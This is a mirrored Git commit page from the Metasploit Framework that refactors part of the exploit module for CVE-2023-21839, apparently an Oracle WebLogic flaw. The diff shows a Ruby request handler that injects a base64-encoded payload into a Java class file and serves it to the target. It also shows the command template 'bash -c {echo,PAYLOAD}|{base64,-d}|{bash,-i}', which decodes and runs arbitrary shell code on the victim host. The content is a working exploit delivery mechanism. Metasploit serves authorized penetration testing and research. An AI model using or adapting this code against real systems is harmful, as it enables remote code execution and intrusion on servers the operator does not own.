mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
Slight efficiency improvements
This commit is contained in:
parent
e80987ea59
commit
7ca7c6aee1
Binary file not shown.
@ -1,3 +1,5 @@
|
||||
import java.util.Base64;
|
||||
|
||||
public class PayloadRuns {
|
||||
static {
|
||||
try {
|
||||
@ -6,4 +8,4 @@ public class PayloadRuns {
|
||||
ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
@ -375,12 +375,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
def on_request_uri(cli, request)
|
||||
agent = request.headers['User-Agent']
|
||||
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
|
||||
file = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'), 'rb')
|
||||
class_raw = file.read
|
||||
file.close
|
||||
class_raw = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'))
|
||||
base64_payload = Rex::Text.encode_base64(payload.encoded)
|
||||
command_length = (44 - 'PAYLOAD'.length) + base64_payload.length
|
||||
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('S>'))
|
||||
exec_command_length = 'bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}'.length
|
||||
command_length = (exec_command_length - 'PAYLOAD'.length) + base64_payload.length
|
||||
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('n'))
|
||||
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
|
||||
send_response(cli, 200, 'OK', class_raw)
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user